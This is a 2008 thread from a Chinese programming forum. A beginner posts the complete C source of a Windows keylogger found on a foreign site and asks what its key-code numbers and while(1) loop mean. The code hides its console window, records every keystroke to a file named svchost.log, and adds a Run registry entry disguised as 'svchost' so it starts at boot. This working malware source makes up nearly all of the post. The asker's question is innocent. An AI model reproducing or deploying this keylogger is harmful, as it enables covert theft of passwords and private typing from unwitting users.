| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 899 人关注过本帖
标题:一个键盘记录源码的疑问
取消只看楼主 加入收藏
zaroty
Rank: 1
等 级:新手上路
帖 子:93
专家分:0
注 册:2008-3-28
收藏
 问题点数:0 回复次数:1 
一个键盘记录源码的疑问
这个是我在外国网站上见到的一个键盘记录程序。
其中有些部分不是太理解,大家给指点下
#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#define BUFSIZE 80
int test_key(void);
int create_key(char *);
int get_keys(void);
int main(void)
{
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);
    int test,create;
    test=test_key();/*check if key is available for opening*/   
    if (test==2)/*create key*/
    {
        char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
        create=create_key(path);
    }
    int t=get_keys();
    return t;
}  
int get_keys(void)
{
            short character;
              while(1)
              {
                     for(character=8;character<=222;character++)
                     {
                         if(GetAsyncKeyState(character)==-32767)
                         {
                             FILE *file;
                             file=fopen("svchost.log","a+");
                             if(file==NULL)
                             {
                                     return 1;
                             }            
                             if(file!=NULL)
                             {        
                                     if((character>=39)&&(character<=64))
                                     {
                                           fputc(character,file);
                                           fclose(file);
                                           break;
                                     }        
                                     else if((character>64)&&(character<91))

                                     {

                                           character+=32;

                                           fputc(character,file);

                                           fclose(file);

                                           break;

                                     }

                                     else

                                     {

                                         switch(character)

                                         {

                                               case VK_SPACE:

                                               fputc(' ',file);

                                               fclose(file);

                                               break;   

                                               case VK_SHIFT:

                                               fputs("[SHIFT]",file);

                                               fclose(file);

                                               break;                                            

                                               case VK_RETURN:

                                               fputs("\n[ENTER]",file);

                                               fclose(file);

                                               break;

                                               case VK_BACK:

                                               fputs("[BACKSPACE]",file);

                                               fclose(file);

                                               break;

                                               case VK_TAB:

                                               fputs("[TAB]",file);

                                               fclose(file);

                                               break;

                                               case VK_CONTROL:

                                               fputs("[CTRL]",file);

                                               fclose(file);

                                               break;   

                                               case VK_DELETE:

                                               fputs("[DEL]",file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_1:

                                               fputs("[;:]",file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_2:

                                               fputs("[/?]",file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_3:

                                               fputs("[`~]",file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_4:

                                               fputs("[ [{ ]",file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_5:

                                               fputs("[\\|]",file);

                                               fclose(file);

                                               break;                                

                                               case VK_OEM_6:

                                               fputs("[ ]} ]",file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_7:

                                               fputs("['\"]",file);

                                               fclose(file);

                                               break;

                                               /*case VK_OEM_PLUS:

                                               fputc('+',file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_COMMA:

                                               fputc(',',file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_MINUS:

                                               fputc('-',file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_PERIOD:

                                               fputc('.',file);

                                               fclose(file);

                                               break;*/

                                               case VK_NUMPAD0:

                                               fputc('0',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD1:

                                               fputc('1',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD2:

                                               fputc('2',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD3:

                                               fputc('3',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD4:

                                               fputc('4',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD5:

                                               fputc('5',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD6:

                                               fputc('6',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD7:

                                               fputc('7',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD8:

                                               fputc('8',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD9:

                                               fputc('9',file);

                                               fclose(file);

                                               break;

                                               case VK_CAPITAL:

                                               fputs("[CAPS LOCK]",file);

                                               fclose(file);

                                               break;

                                               default:

                                               fclose(file);

                                               break;

                                        }        

                                   }   

                              }        

                    }   

                }                  

                     

            }

            return EXIT_SUCCESS;                           

}                                                



int test_key(void)

{

    int check;

    HKEY hKey;

    char path[BUFSIZE];

    DWORD buf_length=BUFSIZE;

    int reg_key;

   

    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);

    if(reg_key!=0)

    {   

        check=1;

        return check;

    }        

           

    reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);

   

    if((reg_key!=0)||(buf_length>BUFSIZE))

        check=2;

    if(reg_key==0)

        check=0;

         

    RegCloseKey(hKey);

    return check;   

}

   

int create_key(char *path)

{   

        int reg_key,check;

        

        HKEY hkey;

        

        reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);

        if(reg_key==0)

        {

                RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));

                check=0;

                return check;

        }

        if(reg_key!=0)

                check=1;

               

        return check;

}

那个红色的数字是什么意思啊? 还有那个蓝色部分,他上来就while(1),这里的(1)到底指的是那个东西的值啊?

请教高手赐教,谢谢!
搜索更多相关主题的帖子: 源码 stealth int windows 疑问 
2008-04-10 12:51
zaroty
Rank: 1
等 级:新手上路
帖 子:93
专家分:0
注 册:2008-3-28
收藏
得分:0 
俄、、、不是想做木马啊。就是对那个语句不明白,我对API还不是太熟悉。。

http://hi.baidu.com/zaroty  偶滴博客
2008-04-10 17:19
快速回复:一个键盘记录源码的疑问
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.032417 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved